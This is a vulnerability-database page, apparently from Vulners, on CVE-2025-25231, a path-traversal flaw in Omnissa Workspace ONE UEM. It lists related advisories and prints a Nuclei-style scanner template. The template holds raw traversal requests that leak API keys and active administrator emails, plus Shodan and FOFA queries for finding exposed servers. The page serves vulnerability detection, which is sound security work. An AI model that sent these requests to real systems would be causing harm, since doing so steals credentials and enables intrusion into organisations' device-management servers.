| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2025-25231 | 14 Aug 202521:02 | – | circl | |
| Omnissa Workspace ONE UEM 安全漏洞 | 11 Aug 202500:00 | – | cnnvd | |
| CVE-2025-25231 | 11 Aug 202518:12 | – | cve | |
| CVE-2025-25231 | 11 Aug 202518:12 | – | cvelist | |
| EUVD-2025-24160 | 11 Aug 202518:12 | – | euvd | |
| Exploit for CVE-2025-25231 | 12 Aug 202509:05 | – | githubexploit | |
| Vulnerabilities fixed in Omnissa Workspace ONE UEM | 12 Sep 202515:23 | – | ncsc | |
| CVE-2025-25231 | 11 Aug 202518:15 | – | nvd | |
| Omnissa Workspace ONE UEM Multiple Vulnerabilities (OMSA-2025-0004) | 26 Sep 202500:00 | – | nessus | |
| Omnissa Workspace ONE UEM Path Traversal / Server-Side Request Forgery | 12 Aug 202500:00 | – | packetstormnews |
id: CVE-2025-25231
info:
name: Omnissa Workspace ONE UEM - Path Traversal
author: DhiyaneshDK,slcyber
severity: high
description: |
Omnissa Workspace ONE UEM contains a path traversal caused by crafted GET requests to restricted API endpoints, letting malicious actors access sensitive information, exploit requires sending crafted requests.
impact: |
Malicious actors can access sensitive information by exploiting path traversal in API endpoints.
remediation: |
Update to the latest version.
reference:
- https://slcyber.io/assetnote-security-research-center/secondary-context-path-traversal-in-omnissa-workspace-one-uem/#wrap-up-&-acknowledgements
- https://www.omnissa.com/omsa-2025-0004/
- https://nvd.nist.gov/vuln/detail/CVE-2025-25231
metadata:
verified: true
max-request: 1
vendor: vmware
product: workspace_one_uem_console
fofa-query: banner="/airwatch/default.aspx" || header="/airwatch/default.aspx"
shodan-query: html:"/airwatch/default.aspx"
tags: cve,cve2025,omnissa,workspace,airwatch,traversal,vkev,vuln
flow: http(1) || http(2)
http:
- raw:
- |
GET /DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/groups/apikeys%3fogname=Global HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "service_name","api_key")'
- 'contains(content_type, "application/json")'
- "status_code == 200"
condition: and
extractors:
- type: json
name: api_key
json:
- '.api_keys[].api_key'
- raw:
- |
GET /DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/admins/search?status=active%3fogname=Global HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "AdminUser","Uuid")'
- 'contains(content_type, "application/xml")'
- "status_code == 200"
condition: and
extractors:
- type: regex
part: body
name: admin_email
group: 1
regex:
- '<Email>([^<]+)</Email>'
# digest: 490a004630440220217b06c57a2dca7f790385d77860cae76cffa6c4d04151ce9586e75c69627eb202207aebedf31e1c1e4b1786d11c6cd84daa3cd490c86ac210f7a8bc882c48e4ac33:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation